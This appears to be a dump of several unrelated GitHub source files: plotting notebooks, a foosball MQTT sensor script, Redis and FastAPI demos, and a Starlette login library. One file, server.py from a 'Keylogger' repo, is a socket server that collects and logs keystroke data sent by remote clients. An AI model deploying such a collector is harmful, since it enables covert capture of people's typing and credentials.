# And as everything here - this is just my experiments to calm my mind.
# %%
c = 'Germany'
m = ~ gr[c].isnull()
plt.plot(confpc[c][m].values, gr[c][m].values,'.-')
(b, a), t = model[c]
c0 = confpc[c][-1]/exp(exp(b*t.max()+a)/b)
ci = gr[c][m].values[-1]/(exp(exp(b*t.max()+a)/b)*exp(b*t.max()+a))
t = linspace(t.min(), t.max()+60, 100)
plt.loglog(exp(exp(b*t+a)/b)*c0,exp(exp(b*t+a)/b)*exp(b*t+a)*ci, '-');
# %%
model
# %%
conf.diff()[-3:][['Poland','US']]
# %%
(conf-recov-vict)[-3:][['Poland','US']]
# %%
``` |
{
"source": "jockaayush/Keylogger",
"score": 3
} |
#### File: jockaayush/Keylogger/server.py
```python
import socket
from _thread import *
from sys import exit
host = ''
port = 55555 #Update it
log_file = '/root/Desktop/server_log.txt' #Update it
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.bind((host,port))
except socket.error as e:
print(str(e))
exit(1)
sock.listen(5)
print('Waiting...')
def threaded_client(conn):
global a,fopen
while True:
data = conn.recv(2048)
if not data:
break
# print("Received from ("+ conn.getpeername()[0] + ":"+ str(conn.getpeername()[1])+") ->" + data.decode('utf-8'))
if (data.decode('utf-8') == "Connection Closed"):
a.remove(conn.getpeername())
fopen.close()
break
fopen = open(log_file,'a')
fopen.write("From("+ conn.getpeername()[0] + ":"+ str(conn.getpeername()[1])+")->" + data.decode('utf-8'))
fopen.write('\n')
fopen.close()
conn.shutdown(1)
conn.close()
a = []
try :
while True:
conn, addr = sock.accept()
a.append(addr)
print('connected to: '+addr[0]+':'+str(addr[1]))
start_new_thread(threaded_client,(conn,))
print(a)
except KeyboardInterrupt:
fopen.close()
sock.shutdown(0)
sock.close()
``` |
{
"source": "jock-dalby/pythonTreehouse",
"score": 4
} |
#### File: pythonTreehouse/example_apps/even_or_odd_loop.py
```python
import random
def even_odd(num):
# If % 2 is 0, the number is even.
# Since 0 is falsey, we have to invert it with not.
return not num % 2
start = 5
while True:
rand_number = random.randint(1,99)
if start == 0:
break;
elif even_odd(rand_number):
print("{} is even".format(rand_number))
else:
print("{} is odd".format(rand_number))
start-=1
``` |
{
"source": "JockDaRock/IoT_Foosball_Player2",
"score": 3
} |
#### File: JockDaRock/IoT_Foosball_Player2/player2.py
```python
import RPi.GPIO as GPIO
import json
import paho.mqtt.client as mqtt
import time
import asyncio
thread = None
score_topic = "foosball/score"
speed_topic = "foosball/speed"
# 192.168.195.7 was IR 829 Broker
broker_ip = "10.8.182.131" # <--- Please change IP to match the location of your MQTT broker
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
ir = 15
ir2 = 18
mqttc = mqtt.Client()
mqttc.connect(broker_ip)
mqttc.loop_start()
GPIO.setup(ir, GPIO.IN, GPIO.PUD_UP)
GPIO.setup(ir2, GPIO.IN, GPIO.PUD_DOWN)
start = 0
stop = 0
async def data_collect_ir():
GPIO.add_event_detect(ir, GPIO.BOTH, callback=process_edge, bouncetime=5)
def process_edge(channel):
if GPIO.input(channel): # test if pin is high
post_speed(channel)
else:
post_score(channel)
def post_score(channel):
global start
start = time.time()
print("Start time is:")
print(start)
brokerMessage = {'Status': 'scored', 'Player': '2', 'Score': 1, 'Data': '0'}
print("message sent")
mqttc.publish(score_topic, json.dumps(brokerMessage))
def post_speed(channel):
global stop
stop = time.time()
print("Stop time is:")
print(stop)
if stop > start:
elapsed = stop - start
print("Elapsed time is:")
print(elapsed)
speed = .0345 / elapsed # meters per second
mph = 2.23694 * speed # convert meters/s to mph
print("posting speed")
print(mph)
brokerMessage = {'Status': 'speed', 'Speed': mph}
mqttc.publish(speed_topic, json.dumps(brokerMessage))
if __name__ == '__main__':
# data_collect()
loop = asyncio.get_event_loop()
# tasks = [asyncio.ensure_future(data_collect_ir()), asyncio.ensure_future(data_collect_ir2())]
tasks = [asyncio.get_event_loop().run_until_complete(data_collect_ir())]
loop.run_forever()
print("started")
``` |
{
"source": "JockDaRock/meraki_snort_blocklist_check",
"score": 3
} |
#### File: JockDaRock/meraki_snort_blocklist_check/meraki_controller.py
```python
import requests
def meraki_network_traffic(net_ID, api_key, time_span):
url = "https://api.meraki.com/api/v1/networks/{0}/traffic".format(net_ID)
querystring = {"timespan": time_span}
headers = {
'Accept': "*/*",
'X-Cisco-Meraki-API-Key': api_key,
}
response = requests.request("GET", url, headers=headers, params=querystring)
#insert logging here
return response.json()
``` |
{
"source": "jocke45/COD-BOT",
"score": 3
} |
#### File: COD-BOT/src/handle_data.py
```python
import discord
import json
import get_data
# Get the data we are going to handle
data: dict = get_data.get_data()
def get_best_aim(player):
""""""
return data
def get_level(player):
"""Returns player level as a float"""
return data['level']
def get_stats(player):
"""Get certain stats for the player"""
# TODO
return "not done"
def get_suicides(player):
"""Return number of suicides for the player as a float"""
return data['lifetime']['all']['properties']['suicides']
def get_wins(player):
"""Return number of wins for the player as a float"""
return data['lifetime']['mode']['br']['properties']['wins']
def get_level_embed(player):
player_level = str(int(get_level(player)))
embed = discord.Embed()
embed.add_field(name='Level', value='Player ' + player + ' is level ' + player_level, inline=True)
return embed
def get_stats_embed(player):
player_stats = get_stats(player)
embed = discord.Embed()
embed.add_field(name='Stats', value=player + ' is level ' + player_stats, inline=True)
return embed
def get_wins_embed(player):
player_wins = str(int(get_wins(player)))
player_suicides = str(int(get_suicides(player)))
embed = discord.Embed()
embed.add_field(name='Wins', value='Player ' + player + ' has won ' + player_wins + ' times!\n They also suicided '
+ player_suicides + ' times...',
inline=True)
return embed
print(data['lifetime']['all']['properties']['suicides'])
``` |
{
"source": "jocke-l/phraseless",
"score": 2
} |
#### File: contrib/django/__init__.py
```python
import os
from base64 import urlsafe_b64encode, urlsafe_b64decode
from django.contrib.auth import get_user_model
from django.utils.deprecation import MiddlewareMixin
from urllib.parse import urlencode
from phraseless.certificates import get_name
from phraseless.certificates import verify_challenge, verify_certificate_chain
class PhraselessChallengeMiddleware(MiddlewareMixin):
def process_response(self, request, response):
if not request.user.is_authenticated:
challenge = urlsafe_b64encode(os.urandom(32)).decode()
request.session['auth_challenge'] = challenge
response['X-Challenge'] = challenge
return response
class PhraselessAuthBackend:
def authenticate(self, request, certificate_chain=None, signature=None):
user_model = get_user_model()
try:
user = user_model.objects.get(
username=get_name(certificate_chain[0])
)
except user_model.DoesNotExist:
return None
valid_chain = verify_certificate_chain(
certificate_chain,
user.certificates.all().to_tuples()
)
valid_challenge_signature = verify_challenge(
urlsafe_b64decode(request.session['auth_challenge']),
signature,
certificate_chain[0]
)
if valid_chain and valid_challenge_signature:
return user
def get_user(self, user_id):
user_model = get_user_model()
try:
user_model.objects.get(pk=user_id)
except user_model.DoesNotExist:
return None
default_app_config = 'phraseless.contrib.django.apps.PhraselessConfig'
```
#### File: contrib/django/views.py
```python
from django.contrib.auth import authenticate as authenticate_
from django.http import HttpResponse
from phraseless.contrib.django.forms import CertificateAuth
def authenticate(request):
form = CertificateAuth(request.POST)
if form.is_valid():
user = authenticate_(
request,
certificate_chain=form.cleaned_data['certificate_chain'],
signature=form.cleaned_data['challenge_signature']
)
else:
user = None
response = HttpResponse()
if user:
response['X-Authenticated'] = 'yes'
else:
response['X-Authenticated'] = 'no'
return response
``` |
{
"source": "jocke-l/respx",
"score": 2
} |
#### File: respx/respx/fixtures.py
```python
try:
import pytest
except ImportError: # pragma: nocover
pass
else:
import asyncio
@pytest.fixture(scope="session")
def session_event_loop():
loop = asyncio.get_event_loop_policy().new_event_loop()
yield loop
loop.close()
``` |
{
"source": "jocke-l/try-default",
"score": 3
} |
#### File: try-default/try_default/tests.py
```python
import unittest
from . import try_default
from ._utils import curried
class Curried(unittest.TestCase):
def test_identity(self):
self.assertEqual(curried(lambda: 1), 1)
self.assertEqual(curried(lambda a: a)(1), 1)
def testcurried(self):
curried_func = curried(lambda a, b, c: a + b + c)
self.assertEqual(curried_func(1)(2)(3), 6)
self.assertEqual(curried_func(1)(2, 3), 6)
self.assertEqual(curried_func(1, 2, 3), 6)
self.assertEqual(curried_func(1, 2)(3), 6)
class TryDefault(unittest.TestCase):
def test_core_features(self):
self.assertEqual(try_default(lambda: [][1], {IndexError: 0}), 0)
self.assertEqual(try_default(lambda: [1][0], {IndexError: 0}), 1)
def test_parent_catch(self):
def raise_keyboard_interrupt():
raise KeyboardInterrupt
self.assertEqual(try_default(raise_keyboard_interrupt,
{KeyboardInterrupt: 0}), 0)
self.assertEqual(try_default(raise_keyboard_interrupt,
{BaseException: 0}), 0)
def test_reraise_unhandled_exception(self):
with self.assertRaises(IndexError):
try_default(lambda: [][1], {})
def test_args(self):
def get_actual_budget(costs, headroom):
return sum(costs) + headroom
get_budget = try_default(get_actual_budget, {TypeError: 0})
broken_costs = [25, 25, None, 10]
clean_costs = [25, 25, 10]
self.assertEqual(get_budget(broken_costs, 100), 0)
self.assertEqual(get_budget(clean_costs, 100), 160)
def test_empty_args(self):
with self.assertRaises(TypeError):
try_default(lambda a: 1, {TypeError: 1})()
def test_decorator(self):
@try_default({KeyboardInterrupt: 0})
def foo(a, b):
raise KeyboardInterrupt
self.assertEqual(foo(1, 2), 0)
``` |
{
"source": "jocker1854/nepula",
"score": 3
} |
#### File: jocker1854/nepula/chatbot.py
```python
import random
import json
import nltk
import torch
import transformers
from gtts import gTTS
import speech_recognition as sr
import os
import playsound
import config
import pyjokes
from nltk.stem.porter import PorterStemmer
import numpy as np
from torch.utils.data import Dataset, DataLoader
import torch.nn as nn
class Prepare_Data():
def __init__(self, json_file, ignore_words):
self.json_file = json_file
self.patterns = []
self.all_words = []
self.tags = []
self.xy = []
self.X_train = []
self.y_train = []
self.ignore_words = ignore_words
self.stemmer = PorterStemmer()
def tokenize(self, sentence):
return nltk.word_tokenize(sentence)
def stem(self, word):
return self.stemmer.stem(word.lower())
def bag_of_words(self, tokenized_sentence, words):
sentence_words = [self.stem(word) for word in tokenized_sentence]
# initialize bag with 0 for each word
bag = np.zeros(len(words), dtype=np.float32)
for idx, w in enumerate(words):
if w in sentence_words:
bag[idx] = 1
return bag
def load_json(self):
with open(self.json_file, 'r') as file:
self.intents = json.load(file)
return self.intents
@staticmethod
def text_to_speech(text):
print(text)
speaker = gTTS(text=text, lang="en", slow=False)
speaker.save("a.mp3")
playsound.playsound("a.mp3")
os.remove("a.mp3")
def speech_to_text(self):
recognizer = sr.Recognizer()
with sr.Microphone() as source:
self.text_to_speech("listening...")
audio = recognizer.listen(source)
recognizer.pause_threshold = 1
try:
self.text = recognizer.recognize_google(audio)
print(self.text)
except Exception:
self.text = "say that again.."
return self.text
def prs1(self):
for intent in self.load_json()['intents']:
tag = intent['tag']
self.tags.append(tag)
for pattern in intent['patterns']:
w = self.tokenize(pattern)
self.all_words.extend(w)
self.xy.append((w, tag))
pattern = pattern.lower()
self.patterns.append(pattern)
self.all_words = [self.stem(w) for w in self.all_words if w not in self.ignore_words]
self.all_words = sorted(set(self.all_words))
self.tags = sorted(set(self.tags))
for (pattern_sentence, tag) in self.xy:
bag = self.bag_of_words(pattern_sentence, self.all_words)
self.X_train.append(bag)
label = self.tags.index(tag)
self.y_train.append(label)
self.X_train = np.array(self.X_train)
self.y_train = np.array(self.y_train)
return self.tags, self.all_words, self.patterns, self.X_train, self.y_train
class ChatDataset(Dataset):
def __init__(self):
self.prepare = Prepare_Data(json_file, ignore_words)
self.tags, self.all_words, self.patterns, self.X_train, self.y_train = self.prepare.prs1()
self.n_samples = len(self.X_train)
self.x_data = self.X_train
self.y_data = self.y_train
def __getitem__(self, index):
return self.x_data[index], self.y_data[index]
def __len__(self):
return self.n_samples
class NeuralNet(nn.Module):
def __init__(self, input_size, hidden_size, num_classes):
super(NeuralNet, self).__init__()
self.l1 = nn.Linear(input_size, hidden_size)
self.l2 = nn.Linear(hidden_size, hidden_size)
self.l3 = nn.Linear(hidden_size, num_classes)
self.relu = nn.ReLU()
def forward(self, x):
out = self.l1(x)
out = self.relu(out)
out = self.l2(out)
out = self.relu(out)
out = self.l3(out)
return out
class Train():
def __init__(self):
self.num_epochs = config.NUM_EPOCHS
self.batch_size = config.BATCH_SIZE
self.learning_rate = config.LEARNING_RATE
self.input_size = len(X_train[0])
self.hidden_size = config.HIDDEN_SIZE
self.num_classes = len(tags)
self.dataset = ChatDataset()
self.train_loader = DataLoader(dataset=self.dataset,
batch_size=config.BATCH_SIZE,
shuffle=True,
num_workers=0)
self.model = NeuralNet(self.input_size, self.hidden_size, self.num_classes)
self.criterion = nn.CrossEntropyLoss()
self.optimizer = torch.optim.Adam(self.model.parameters(), lr=config.LEARNING_RATE)
self.prepare = Prepare_Data(json_file, ignore_words)
self.tags, self.all_words,_,_,_ = self.prepare.prs1()
def train(self):
for epoch in range(self.num_epochs):
global loss
for (words, labels) in self.train_loader:
words = words.to(config.DEVICE)
labels = labels.to(dtype=torch.long).to(config.DEVICE)
outputs = self.model(words)
loss = self.criterion(outputs, labels)
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
if (epoch + 1) % 100 == 0:
print(f'Epoch [{epoch + 1}/{self.num_epochs}], Loss: {loss.item():.4f}')
print(f'final loss: {loss.item():.4f}')
data = {
"model_state": self.model.state_dict(),
"input_size": self.input_size,
"hidden_size": self.hidden_size,
"output_size": self.num_classes,
"all_words": self.all_words,
"tags": self.tags
}
if loss < 0.001:
FILE = "data.pth"
torch.save(data, FILE)
print(f'training complete. file saved to {FILE}')
class ChatBot():
def __init__(self):
self.tools = Prepare_Data(json_file, ignore_words)
self.speech_to_text = self.tools.speech_to_text
self.text_to_speech = self.tools.text_to_speech
self.intents = self.tools.load_json()
#self.tags, self.all_words, self.patterns, self.X_train, self.y_train =
self.tags = self.tools.tags
self.tokenize = self.tools.tokenize
self.bag_of_words = self.tools.bag_of_words
def load_model(self, model_file):
data = torch.load(model_file)
input_size = data["input_size"]
hidden_size = data["hidden_size"]
output_size = data["output_size"]
model_state = data["model_state"]
tags = data["tags"]
model = NeuralNet(input_size, hidden_size, output_size).to(config.DEVICE)
model.load_state_dict(model_state)
model.eval()
return model, tags
def chat(self):
nlp = transformers.pipeline("conversational", model="microsoft/DialoGPT-large", pretrained=True)
os.environ["TOKENIZERS_PARALLELISM"] = "true"
while True:
sentence = self.speech_to_text()
if any(i in sentence for i in ["ok quit", "quit", "shutup", "go home"]):
r = ["have fun", "see you later", "ok bye"]
self.text_to_speech(random.choice(r))
quit()
elif "joke" in sentence:
joke = pyjokes.get_joke(language="en", category="all")
res = joke
if any(i in sentence for i in patterns):
in_ = self.tokenize(sentence)
X = self.bag_of_words(in_, all_words)
X = X.reshape(1, X.shape[0])
X = torch.from_numpy(X).to(config.DEVICE)
model, tags = self.load_model(model_file)
output = model(X)
_, predicted = torch.max(output, dim=1)
tag = tags[predicted.item()]
probs = torch.softmax(output, dim=1)
prob = probs[0][predicted.item()]
if prob.item() > 0.75:
for intent in self.intents['intents']:
if tag == intent['tag']:
res = random.choice(intent['responses'])
else:
res = "none"
if any(i in res for i in ["none", "None"]):
chat = nlp(transformers.Conversation(sentence), pad_token_id=50256)
res = str(chat)
res = res[res.find("bot >> ") + 6:].strip()
self.text_to_speech(res)
if __name__ == '__main__':
json_file = "myintents.json"
ignore_words = ["?", "!"]
prepare = Prepare_Data(json_file, ignore_words)
tags, all_words, patterns, X_train, y_train = prepare.prs1()
# for training uncomment
#train = Train()
#train.train()
model_file = "data.pth"
#chat
chat_bot = ChatBot()
chat_bot.chat()
``` |
{
"source": "Jocker271/advent-of-code",
"score": 3
} |
#### File: 2015/day_02/day_2.py
```python
import os
def get_challenge_input():
'''Read input.txt and return content as List'''
input_file = f'{os.path.dirname(__file__)}\\input.txt'
with open(input_file, encoding='utf-8', mode='r') as file:
lines = file.read().split("\n")
return lines
def part_one(puzzle):
'''Solving the first challenge'''
total_paper = 0
for line in puzzle:
length, width, height = [int(i) for i in line.split('x')]
a = length * width
b = width * height
c = height * length
slack = min(int(s) for s in [a, b, c])
present_paper = 2 * a + 2 * b + 2 * c + slack
total_paper += present_paper
return total_paper
def part_two(puzzle):
'''Solving the second challenge'''
total_ribbon = 0
for line in puzzle:
length, width, height = [int(i) for i in line.split('x')]
sides = [length, width, height]
sides.remove(max(sides))
result = 2 * sides[0] + 2 * sides[1] + length * width * height
total_ribbon += result
return total_ribbon
puzzle = get_challenge_input()
print(f'Part 1: {part_one(puzzle)}')
print(f'Part 2: {part_two(puzzle)}')
```
#### File: 2015/day_06/day_6.py
```python
import os
import re
import numpy as np
def get_challenge_input():
'''Read input.txt and return content as List'''
input_file = f'{os.path.dirname(__file__)}\\input.txt'
with open(input_file, encoding='utf-8', mode='r') as file:
lines = file.read().split('\n')
return lines
def part_one(puzzle):
'''Solving the first challenge'''
array = np.zeros((1000,1000), dtype=bool)
regex = r'(\w+) (\d+),(\d+) through (\d+),(\d+)'
for line in puzzle:
command, x0, y0, x1, y1 = re.search(regex, line).groups()
corners = [[x0, x1], [y0, y1]]
x_slice, y_slice = [slice(int(a), int(b) + 1) for a, b in corners]
if command == 'toggle':
array[x_slice, y_slice] = np.invert(array[x_slice, y_slice])
else:
array[x_slice, y_slice] = ['off', 'on'].index(command)
return sum(sum(array))
def part_two(puzzle):
'''Solving the second challenge'''
array = np.zeros((1000,1000), dtype=int)
regex = r'(\w+) (\d+),(\d+) through (\d+),(\d+)'
for line in puzzle:
command, x0, y0, x1, y1 = re.search(regex, line).groups()
corners = [[x0, x1], [y0, y1]]
x_slice, y_slice = [slice(int(a), int(b) + 1) for a, b in corners]
transform = {'on': 1, 'off': -1, 'toggle': 2}
array[x_slice, y_slice] += transform.get(command)
array[array < 0] = 0 # cannot be less than 0 bright
return sum(sum(array))
puzzle = get_challenge_input()
print(f'Part 1: {part_one(puzzle)}')
print(f'Part 2: {part_two(puzzle)}')
```
#### File: 2015/day_10/day_10.py
```python
import re
def look_and_say(sequence, loops):
regex = re.compile(r'((\d)\2*)')
sequence = str(sequence)
def replace(match_obj):
match = match_obj.group(1)
return str(len(match)) + match[0]
for loop in range(loops):
sequence = regex.sub(replace, sequence)
return sequence
puzzle = 1113222113 # challenge input is very short this day
part_one = look_and_say(puzzle, 40)
print(f'Part 1: {len(part_one)}')
part_two = look_and_say(part_one, 10)
print(f'Part 2: {len(part_two)}')
################################ code relicts ################################
def look_and_say_first_try(sequence, loops):
'''My first attempt to solve the puzzle, but too slow for 50 loop passes.
So I had to find a better way -> look_and_say()
'''
sequence = str(sequence)
def count_char_in_row(sub_sequence):
char = sub_sequence[0]
count = 1
if len(sub_sequence) > 2 and char == sub_sequence[1]:
count += count_char_in_row(sub_sequence[1:])
return count
for loop in range(loops):
new_sequence = []
skip = 0
for idx, char in enumerate(sequence):
if skip > 0:
skip -= 1
else:
count = count_char_in_row(sequence[idx:])
new_sequence.extend([str(count), char])
skip = count - 1
sequence = "".join(new_sequence)
return sequence
```
#### File: Jocker271/advent-of-code/template.py
```python
import os
from datetime import datetime
def main():
'''Retrieves user input and executes this script.'''
while True:
print('For which year do you want to create the file structure?')
year = input("Year: ") or str(datetime.now().year)
if year.isdigit() and len(year) == 4:
create_file_structure(year)
break
print(f'{year} is not a possible value.')
print('✓ File structure successfully created')
def create_file_structure(year):
'''Creates python and text files for each day in a seperate folder.'''
parent = os.getcwd()
folder_path = os.path.join(parent, year)
if not os.path.exists(folder_path):
os.mkdir(folder_path)
template = get_template().replace('{year}', year)
for day in range(1, 26):
day_folder = os.path.join(folder_path, f'day_{str(day).zfill(2)}')
if not os.path.exists(day_folder):
os.mkdir(day_folder)
py_file_path = os.path.join(day_folder, f'day_{str(day)}.py')
txt_file_path = os.path.join(day_folder, 'input.txt')
with open(py_file_path, encoding='utf-8', mode='w+') as py_file:
py_file.write(template.replace('{day}', str(day)))
#py_file.close()
open(txt_file_path, encoding='utf-8', mode='x').close()
def get_template():
'''Returns template inside this file (look at the end) as String.'''
template = ''
with open(__file__, encoding='utf-8', mode='r') as this_file:
start_template = False
for line in this_file:
if start_template:
template += line[2:] if len(line) > 2 else '\n'
elif line == '# --- TEMPLATE STARTS HERE ---\n':
start_template = True
return template
main()
# --- TEMPLATE STARTS HERE ---
# '''
# Created on {year}-12-{day}
# by <NAME> - (Jocker271)
# --------------------------------
# Find this challenge at https://adventofcode.com/{year}/day/{day}
# '''
# import os
# def get_challenge_input():
# '''Read input.txt and return content as List'''
# input_file = f'{os.path.dirname(__file__)}\\input.txt'
# with open(input_file, encoding='utf-8', mode='r') as file:
# lines = file.read().split('\n')
# # lines = [int(line) for line in lines]
# return lines
# def part_one(puzzle):
# '''Solving the first challenge'''
# result = 0
# for line in puzzle:
# if line:
# result += 1
# return str(result)
# def part_two(puzzle):
# '''Solving the second challenge'''
# result = 0
# for idx, line in enumerate(puzzle):
# if line:
# result = idx
# break
# return str(result)
# puzzle = get_challenge_input()
# print(f'Part 1: {part_one(puzzle)}')
# print(f'Part 2: {part_two(puzzle)}')
``` |
{
"source": "Jockero1991/litecart-login",
"score": 2
} |
#### File: litecart-login/litecart-login/search_errors.py
```python
import pytest
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.support import expected_conditions as EC
from time import sleep
import os
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.support.events import EventFiringWebDriver, AbstractEventListener
@pytest.fixture
def driver(request):
chrome_options = Options()
chrome_options.add_argument("--window-size=1920,1080")
caps=DesiredCapabilities.CHROME
caps['loggingPrefs']={'browser': 'ALL'}
#caps['loggingPrefs'] = {'performance': 'ALL'}
wd = webdriver.Chrome(
chrome_options=chrome_options, desired_capabilities = caps
)
print(caps)
request.addfinalizer(wd.quit)
return wd
def get_browser_logs(driver, typ):
logs=[]
for l in driver.get_log(typ):
logs.append(l)
#print(l)
return logs
def test_login(driver):
wait = WebDriverWait(driver, 4)
print('Открываем страницу админки')
driver.get('http://localhost/litecart/admin/')
sleep(2)
print('Вводим логин')
wait.until(EC.element_to_be_clickable((By.XPATH, '//*[@name="username"]'))).send_keys('admin')
print('Вводим пароль')
wait.until(EC.element_to_be_clickable((By.XPATH, '//*[@name="password"]'))).send_keys('<PASSWORD>')
print('Жмем кнопку login')
wait.until(EC.element_to_be_clickable((By.XPATH, '//*[@name="login"]'))).click()
sleep(2)
check_console_errors(driver)
def check_console_errors(driver):
print("Переходим в каталог")
cataloges = driver.find_elements_by_xpath('//*[@id="app-"]/a')[1].get_attribute("href")
driver.find_elements_by_xpath('//*[@id="app-"]')[1].click()
sleep(0.5)
print("Разворачиваем каталог с товарами")
driver.find_element_by_link_text("Rubber Ducks").click()
sleep(1)
ducks = driver.find_elements_by_xpath('//*[@class="row"]/td[3]/a')
for i in range(1, len(ducks)):
logs = []
ducks[i].click()
sleep(2)
current_duck = driver.find_element_by_xpath('//*[@id="tab-general"]/table/tbody/tr[2]/td/span/input').get_attribute('value')
print("Переходим в каталог")
driver.get(cataloges)
sleep(2)
print("Разворачиваем каталог с товарами")
driver.find_element_by_link_text("Rubber Ducks").click()
ducks = driver.find_elements_by_xpath('//*[@class="row"]/td[3]/a')
logs = get_browser_logs(driver, 'browser')
if logs:
print('This duck: ' + current_duck + ' has log!')
print(logs)
``` |
{
"source": "jockerz/fastapi-demo-aioredis",
"score": 2
} |
#### File: fastapi-demo-aioredis/app/routes.py
```python
from fastapi import APIRouter, Depends
from app.deps import get_redis
router = APIRouter()
@router.post('/post')
async def save_key_value(
key: str, value: str, redis=Depends(get_redis)
):
await redis.set(key, value)
return {'success': True, 'data': {key: value}}
@router.get('/get')
async def get_value(key: str, redis=Depends(get_redis)):
value = await redis.get(key)
return {
'success': True if value else False,
'data': {key: value}
}
``` |
{
"source": "jockerz/redis_simple_orm",
"score": 2
} |
#### File: RSO/txredisapi/model.py
```python
from typing import Union
from dataclasses import asdict
from txredisapi import BaseRedisProtocol, ConnectionHandler
from twisted.internet.defer import inlineCallbacks, returnValue
from RSO.base import BaseModel
from .index import ListIndex
class Model(BaseModel):
@inlineCallbacks
def is_exist(self, redis: ConnectionHandler):
result = yield redis.exists(self.redis_key)
returnValue(bool(result))
@inlineCallbacks
def save(self, redis: Union[BaseRedisProtocol, ConnectionHandler]):
if isinstance(redis, ConnectionHandler):
pipe = yield redis.multi()
else:
raise NotImplementedError
pipe.hmset(self.redis_key, self.to_redis())
for index_class in self.__indexes__ or []:
if getattr(self, index_class.__key__, None) is None:
continue
index = index_class.create_from_model(self)
yield index.save_index(pipe)
yield pipe.commit()
@inlineCallbacks
def extended_save(
self, redis: Union[BaseRedisProtocol, ConnectionHandler]
):
"""extended save function to avoid multiple push on list index"""
list_index_map = {}
for index_class in self.__indexes__ or []:
if not issubclass(index_class, ListIndex):
continue
index = index_class.create_from_model(self)
model_key_value = getattr(self, self.__key__, None)
if model_key_value is None:
exist_on_index = False
else:
exist_on_index = yield index.is_exist_on_list(
redis, model_key_value
)
list_index_map[index] = exist_on_index
if isinstance(redis, ConnectionHandler):
pipe = yield redis.multi()
else:
raise NotImplementedError
pipe.hmset(self.redis_key, self.to_redis())
for index_class in self.__indexes__ or []:
if getattr(self, index_class.__key__, None) is None:
continue
index = index_class.create_from_model(self)
yield index.save_index(pipe)
# avoid duplicate on index queue list
for index, exist_on_index in list_index_map.items():
if exist_on_index is True:
model_key_value = getattr(self, self.__key__)
yield index.remove_from_list(pipe, model_key_value)
yield pipe.commit()
@classmethod
@inlineCallbacks
def search(cls, redis: ConnectionHandler, value):
redis_key = cls._to_redis_key(value)
result = yield redis.exists(redis_key)
if bool(result):
redis_data = yield redis.hgetall(redis_key)
returnValue(cls(**redis_data))
else:
returnValue(None)
def dict(self):
return asdict(self)
def to_redis(self):
dict_data = self.dict()
for key, value in dict_data.copy().items():
if value is None:
del dict_data[key]
return dict_data
@inlineCallbacks
def delete(self, redis: Union[BaseRedisProtocol, ConnectionHandler]):
if isinstance(redis, ConnectionHandler):
pipe = yield redis.multi()
else:
raise NotImplementedError
for index_class in self.__indexes__ or []:
if getattr(self, index_class.__key__) is None:
continue
index = index_class.create_from_model(self)
index.remove_from_index(pipe)
pipe.delete(self.redis_key)
yield pipe.commit()
``` |
{
"source": "jockerz/Starlette-Login",
"score": 2
} |
#### File: Starlette-Login/starlette_login/utils.py
```python
import hmac
import typing
from datetime import timedelta
from hashlib import sha512
from urllib.parse import quote, urlparse, urlunparse
from starlette.requests import Request
from .mixins import UserMixin, AnonymousUser
LOGIN_MANAGER_ERROR = 'LoginManager is not set'
async def login_user(
request: Request, user: UserMixin, remember: bool = False,
duration: timedelta = None, fresh: bool = True
) -> bool:
assert request.scope.get('app') is not None, \
'Invalid Starlette app'
login_manager = getattr(request.app.state, 'login_manager', None)
assert login_manager is not None, LOGIN_MANAGER_ERROR
login_manager = getattr(request.app.state, 'login_manager', None)
assert login_manager is not None, LOGIN_MANAGER_ERROR
assert user.identity is not None, \
'user identity implementation is required'
request.session[
login_manager.config.SESSION_NAME_KEY
] = user.identity
request.session[
login_manager.config.SESSION_NAME_FRESH
] = fresh
request.session[
login_manager.config.SESSION_NAME_ID
] = create_identifier(request)
if remember:
request.session[
login_manager.config.REMEMBER_COOKIE_NAME
] = 'set'
if duration is not None:
request.session[
login_manager.config.REMEMBER_SECONDS_NAME
] = duration.total_seconds()
request.scope['user'] = user
return True
async def logout_user(request: Request) -> None:
assert request.scope.get('app') is not None, \
'Invalid Starlette app'
login_manager = getattr(request.app.state, 'login_manager', None)
assert login_manager is not None, LOGIN_MANAGER_ERROR
session_key = login_manager.config.SESSION_NAME_KEY
session_fresh = login_manager.config.SESSION_NAME_FRESH
session_id = login_manager.config.SESSION_NAME_ID
remember_cookie = login_manager.config.REMEMBER_COOKIE_NAME
if session_key in request.session:
request.session.pop(session_key)
if session_fresh in request.session:
request.session.pop(session_fresh)
if session_id in request.session:
request.session.pop(session_id)
if remember_cookie in request.cookies:
request.session[remember_cookie] = 'clear'
remember_seconds = login_manager.config.REMEMBER_SECONDS_NAME
if remember_seconds in request.session:
request.session.pop(remember_seconds)
request.scope['user'] = AnonymousUser()
def encode_cookie(payload: str, key: str) -> str:
return f'{payload}|{_cookie_digest(payload, key=key)}'
def decode_cookie(cookie: str, key: str) -> typing.Optional[str]:
try:
payload, digest = cookie.rsplit('|', 1)
if hasattr(digest, 'decode'):
digest = digest.decode('ascii')
except ValueError:
return
if hmac.compare_digest(_cookie_digest(payload, key=key), digest):
return payload
def make_next_url(
redirect_url: str, next_url: str = None
) -> typing.Optional[str]:
if next_url is None:
return redirect_url
r_url = urlparse(redirect_url)
n_url = urlparse(next_url)
if (not r_url.scheme or r_url.scheme == n_url.scheme) and \
(not n_url.netloc or n_url.netloc == n_url.netloc):
param_next = urlunparse((
'', '', n_url.path, n_url.params, n_url.query, ''
))
else:
param_next = next_url
if param_next:
param_next = '='.join(('next', quote(param_next)))
if r_url.query:
result_url = r_url._replace(query='&'.join((r_url.query, param_next)))
else:
result_url = r_url._replace(query=param_next)
return urlunparse(result_url)
def _get_remote_address(request: Request) -> typing.Optional[str]:
address = request.headers.get('X-Forwarded-For')
if address is not None:
address = address.split(',')[0].strip()
else:
client = request.scope.get('client')
if client is not None:
address = client[0]
else:
address = None
return address
def create_identifier(request) -> str:
user_agent = request.headers.get('User-Agent')
if user_agent is not None:
user_agent = user_agent.encode('utf-8')
base = f'{_get_remote_address(request)}|{user_agent}'
h = sha512()
h.update(base.encode('utf8'))
return h.hexdigest()
def _secret_key(secret_key: typing.Union[bytes, str]) -> bytes:
"""ensure bytes"""
if isinstance(secret_key, str):
return secret_key.encode('latin1')
return secret_key
def _cookie_digest(payload: str, key: str) -> str:
key = _secret_key(key)
if not isinstance(payload, str):
payload = str(payload)
